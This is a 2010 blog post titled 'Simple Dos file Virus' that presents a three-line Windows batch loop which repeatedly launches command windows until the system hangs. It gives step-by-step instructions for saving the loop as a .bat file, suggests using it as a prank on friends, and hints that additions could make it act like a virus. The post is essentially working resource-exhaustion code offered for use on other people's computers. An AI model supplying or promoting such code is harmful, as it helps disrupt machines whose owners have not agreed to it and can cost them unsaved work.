Monday, October 4, 2010

Simple Dos file Virus

Hello folks. Dos is always a great fun. Here I present a 3 lines code that can hang your system once you run the batch file. This file can be used as a fun trick with your friends. With little more addition with it, you can make this work like a virus too.
Here is the code
---------------------------------------------------
:l
Start cmd
Goto l
---------------------------------------------------

How to make this
1.Open Notepad. Then type the code.
2. Save it by the extension called .bat. e.g “virus.bat”.
3. Then just double click it. Your system will halt. Just restart the system, it will work fine. Have fun.

0 comments:

Post a Comment

You are most welcome for making comments here. I will consider your view and will reply you soon.